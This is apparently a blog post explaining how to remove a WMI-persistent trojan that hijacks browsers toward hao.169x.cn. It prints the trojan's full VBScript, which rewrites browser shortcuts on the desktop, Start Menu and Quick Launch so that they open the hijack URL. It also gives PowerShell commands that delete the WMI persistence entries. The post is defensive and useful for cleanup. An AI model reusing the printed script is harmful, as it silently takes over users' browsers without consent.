Post a video on YouTube and it will be featured here!
Do you have a brand new device you want me to hack?
Send it to me!
Are you producing a device and want me to check it's security?
Send me an email!
As of now more than 3500 people unlocked Huawei E585, E5830,
E5832S, E583C and HW-01C successfully!





Friday, October 21, 2016

HAO.169x.cn Virus removal.

Hello!
After fighting with this nasty trojan I finally found a solution.

The trojan resides inside windows WMI.

It executes a script that looks like this:


On Error Resume Next
Const link = "http://hao.169x.cn/?v=108&m=yx"
Const link360 = "http://hao.169x.cn/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
      For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                  If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                  Else
                        oShellLink.Arguments = link
                  End If
                  If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                  End If
                  oShellLink.Save
                End If
            End If
      Next
    End If
Next
to remove it is quite simple:

run powershell as administrator and the issue these 4 commands:


gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject


P.S.
The trojan has been found in many softwares including KMS10.
You should remove these softwares too.